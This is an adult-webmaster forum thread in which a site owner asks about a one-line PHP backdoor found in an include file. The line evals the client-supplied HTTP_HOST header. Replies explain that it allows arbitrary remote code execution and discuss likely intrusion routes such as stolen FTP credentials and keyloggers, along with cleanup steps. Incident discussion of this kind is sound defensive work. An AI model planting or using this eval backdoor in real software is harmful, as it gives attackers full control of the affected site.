|
|
|
||||
|
Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums. You are currently viewing our boards as a guest which gives you limited access to view most discussions and access our other features. By joining our free community you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content and access many other special features. Registration is fast, simple and absolutely free so please, join our community today! If you have any problems with the registration process or your account login, please contact us. |
![]() |
|
|||||||
| Discuss what's fucking going on, and which programs are best and worst. One-time "program" announcements from "established" webmasters are allowed. |
|
|
Thread Tools |
|
|
#1 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
Found this code on my site after I signed it up with CCBILL ..
$s=@$_SERVER['HTTP_HOST'];if($s){@eval($s);exit;}
If was placed in one of my includefiles which is used all over.. and none of my pages were loading.. anyone got a clue what this is? |
|
|
|
|
|
#2 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
bump...
Just talked to another guy running a CCBILL site.. he told me they're not touching ones pages what-so-ever.. so I'm like what the fuck is going on here.. |
|
|
|
|
|
#3 |
|
Confirmed User
Join Date: Sep 2006
Location: WA
Posts: 136
|
In the parlance of our times... j00 g0t 0wn3d.
__________________
Pimp pimp... hooray! Pimp pimp... hooray! |
|
|
|
|
|
#4 | |
|
So Fucking What
Industry Role:
Join Date: Jul 2006
Posts: 17,189
|
at least you got a reach around
Quote:
whats the rest of your code ?
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself |
|
|
|
|
|
|
#5 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
That was all there was inserted... I think.. I go through it all a little closely
|
|
|
|
|
|
#6 |
|
Confirmed User
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
|
hmm doesnt make sense to me. how does eval "make sure its good". the exit pretty much makes the whole thing a waste of time anyway. maybe they wanted to waste some cpu before screwing you with the exit :|
|
|
|
|
|
|
#7 |
|
So Fucking What
Industry Role:
Join Date: Jul 2006
Posts: 17,189
|
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself |
|
|
|
|
|
#8 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
How the fuck can anyone gain access to a brand new setup at webair... the only ones knowing my ftp login is CCBILL, they got it a few hours before this happened..
|
|
|
|
|
|
#9 |
|
So Fucking What
Industry Role:
Join Date: Jul 2006
Posts: 17,189
|
... lots of ways
__________________
best host: Webair | best sponsor: Kink | best coder: 688218966 | Go Fuck Yourself |
|
|
|
|
|
#10 |
|
Too lazy to set a custom title
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
|
If what I think is true, that will allow someone to run any php code on your site that they want.
|
|
|
|
|
|
#11 |
|
Confirmed User
Join Date: Jan 2007
Posts: 425
|
seems like a conspiracy
__________________
|
|
|
|
|
|
#12 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
Yes ofcourse.. the eval with do that... hmmm... this looks more and more like an "evil" trespassing...
|
|
|
|
|
|
#13 |
|
Confirmed User
Join Date: Feb 2002
Location: ICQ: 251425 Fr/Au/Ca
Posts: 6,863
|
The code basically executes $_SERVER['HTTP_HOST'] [usually the name of your server] as a PHP commandm then dies.
It's definitely odd, as normally HTTP_HOST has your domainname in it - so executing that as PHP won't do dick - unless someone has already injected another value into it, or register_globals is on and you're getting fucked with. |
|
|
|
|
|
#14 |
|
Confirmed User
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
|
oh shit youre right ! http_host is the hostname the client sends to the server so it can be anything ! y those bastards !
|
|
|
|
|
|
#15 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
Ok, I get the whole picture now... isn't that just great
|
|
|
|
|
|
#16 |
|
Confirmed User
Join Date: Mar 2007
Posts: 570
|
your not the first person
|
|
|
|
|
|
#17 |
|
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
|
is it in the very top or very bottom ?
__________________
hatisblack at yahoo.com |
|
|
|
|
|
#18 |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
two of my clients reported the same thing.
It seems to be part of a botnet/Ddos tool. What i read is, that code can be send to that host, and ask the host to exechute a remote script
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
#19 | |
|
►SouthOfHeaven
Join Date: Jun 2004
Location: PlanetEarth MyBoardRank: GerbilMaster My-Penis-Size: extralarge MyWeapon: Computer
Posts: 28,609
|
Quote:
when was it modified..? and try going to google and type site:yourdomain.com and see if there are any new pages indexed you dont recognize
__________________
hatisblack at yahoo.com |
|
|
|
|
|
|
#20 |
|
♦ Web Developer ♦
Industry Role:
Join Date: May 2005
Location: Full-Stack Developer
Posts: 12,472
|
How the hell can that be placed in EACH ones pages?
|
|
|
|
|
|
#21 |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
because the server was compromised
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
#22 |
|
The Profiler
Industry Role:
Join Date: Oct 2002
Location: ICQ 76281726 and I'm female
Posts: 14,618
|
Uh-oh, not fun for sure...
|
|
|
|
|
|
#23 | |
|
Confirmed User
Join Date: Nov 2005
Posts: 2,171
|
Quote:
__________________
agentGFY *at* gmail.com |
|
|
|
|
|
|
#24 |
|
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,391
|
As I said in other thread it's a way to do php code injection.
__________________
Obey the Cowgod |
|
|
|
|
|
#25 | |
|
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,391
|
Quote:
__________________
Obey the Cowgod |
|
|
|
|
|
|
#26 | |
|
Confirmed User
Join Date: Nov 2005
Posts: 2,171
|
Quote:
__________________
agentGFY *at* gmail.com |
|
|
|
|
|
|
#27 |
|
Confirmed User
Join Date: Jul 2006
Location: Philadelphia
Posts: 1,282
|
you should add a function to log hosts if theyre not equal to any of your domains or ips. log it and the ip it came from. follow the trail and hope you can find this dude and send him to bed with the fishes
|
|
|
|
|
|
#28 |
|
Confirmed User
Join Date: Nov 2005
Posts: 2,171
|
Lol, ok, no jokes.
__________________
agentGFY *at* gmail.com |
|
|
|
|
|
#29 |
|
Registered User
Join Date: Dec 2006
Posts: 22
|
biskoppen,
This doesn't look like any of our codes, but please contact us with the info in my sig and we'll try and help you get this sorted out.
__________________
![]() Matthew Client Support Lead [email protected] United States 1-800-510-2859 International 1-888-596-9279 |
|
|
|
|
|
#30 | |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
Quote:
My host says there's no way this came in besides FTP access, and besides me, you guys are the only ones having this info.. I entered in a sign up form at your site 2 hours before this happened (or so) ICQ : 30898463 |
|
|
|
|
|
|
#31 |
|
Registered User
Join Date: Dec 2006
Posts: 22
|
biskoppen,
Sorry but we don't have access to ICQ, the best way to contact us would either be email ([email protected]) or the phone numbers listed in my sig.
__________________
![]() Matthew Client Support Lead [email protected] United States 1-800-510-2859 International 1-888-596-9279 |
|
|
|
|
|
#32 |
|
Confirmed User
Industry Role:
Join Date: Dec 2004
Location: Denver
Posts: 6,559
|
Maybe you're computer itself is compromised. And/Or there is a leak in your information being sent out. They might have grabbed the FTP info you sent to ccbill. Via someone having access to your computer or email.
__________________
![]() |
|
|
|
|
|
#33 |
|
Too lazy to set a custom title
Industry Role:
Join Date: Feb 2003
Location: NJ
Posts: 13,340
|
so... what is the status of this?
Damn CCBill doesn't have access to ICQ! Come on guys!
__________________
ISeekGirls.com since 2005 |
|
|
|
|
|
#34 | |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
Quote:
There are other sites and server compromised, Its not only "biskoppen"
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
|
#35 |
|
. . .
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
|
I was going to sign up for ccbill soon too.................. watching to see how this develops
and on the topic of ICQ, I had some hosting problems the other day and it was so impressive to be able to ICQ and actually talk with a live tech in the middle of the night (3 am local).... only needed to chat with him for 30 seconds or so but it was really reassuring to have available. this really made a lasting impression on me |
|
|
|
|
|
#36 |
|
AdultTubeSubmits.com
Industry Role:
Join Date: Dec 2003
Location: The Netherlands
Posts: 10,598
|
Pretty sure its not ccbill.
__________________
https://stripcash.com/sign-up/?userI...fff832eb95ab6a |
|
|
|
|
|
#37 | |
|
Confirmed User
Join Date: Aug 2006
Posts: 268
|
Quote:
|
|
|
|
|
|
|
#38 |
|
. . .
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
|
that makes the most sense
|
|
|
|
|
|
#39 |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
I dont get why its not trackable throught the logfiles who did this? have you disabled logging?
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
#40 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
I was told that my logs is truncated every x hours when the stats is run
|
|
|
|
|
|
#41 | |
|
Too lazy to set a custom title
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
|
Quote:
That's interesting... Early this week I was contacted by one of my trades about a similar issue. He had went to some site that was compromised and it had installed a keylogger on his computer. The typical virus protectors like norton etc. didn't catch it. He was saying you needed something better like Kapersky. These guys got his server login info and intalled the same thing on his site.. Apparently they seem to have it automated so it will download all the html (probably php as well), install the exploit and re upload them. Happens very fast. It could be that this is another "version" of that. |
|
|
|
|
|
|
#42 |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
Emagine how much traffic they can steal this way? just a few clicks from each sites can be millions in a few days
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
#43 |
|
. . .
Industry Role:
Join Date: Apr 2007
Location: NY
Posts: 13,724
|
damn, almost like a person needs a separate computer for surfing and one for sensitive data and work
|
|
|
|
|
|
#44 | |
|
Confirmed User
Join Date: May 2007
Location: So fucking gone
Posts: 1,839
|
Quote:
most serious people have.
__________________
Trafficadept | Best traffic I have ever tested | web "@t" cuul.org |
|
|
|
|
|
|
#45 |
|
Affiliate
Join Date: Jul 2004
Posts: 28,735
|
time to change your ftp password
__________________
M&A Queen |
|
|
|
|
|
#46 |
|
Confirmed User
Join Date: Mar 2003
Location: Very small penis
Posts: 5,809
|
|
|
|
|
|
|
#47 |
|
Too lazy to set a custom title
Industry Role:
Join Date: May 2004
Location: West Coast, Canada.
Posts: 10,217
|
|
|
|
|
|
|
#48 |
|
So Fucking Banned
Join Date: Oct 2003
Location: In a house.
Posts: 9,465
|
Here are some potential sources of infection:
1 - your own PC could be infected, anything from a keylogger to a total owning of your PC. 2 - Someone at CCBill could also have a computer with similar ownage. 3 - Your server maybe have been owned either remotely or server to server within your host (a real issue at times with some hosts). This could be from a CMS or similar. Basically, sounds like you got owned pretty majorly. start changing passwords (all passwords, all users with FTP or telnet access, the SU password, etc) and getting your hosting company to looks for holes, including cron tasks, open files, extra users, odd logins, etc. Good luck. |
|
|
|
|
|
#49 | |
|
Confirmed User
Join Date: Nov 2004
Posts: 651
|
Quote:
FTP passwords are sent via plain/clear text. Very easy to pick them off the wire! |
|
|
|
|
|
|
#50 |
|
Mainstream since 2010
Industry Role:
Join Date: Jan 2003
Posts: 1,327
|
Shouldn't be so hard to make a bot that removes that code on all servers it can find, since you can use the exploit to remove the exploit. Maybe have it send the admin an email that the server has been compromised before removing it. I don't have the time, but maybe smokey can do it?
__________________
Alea iacta est |
|
|
|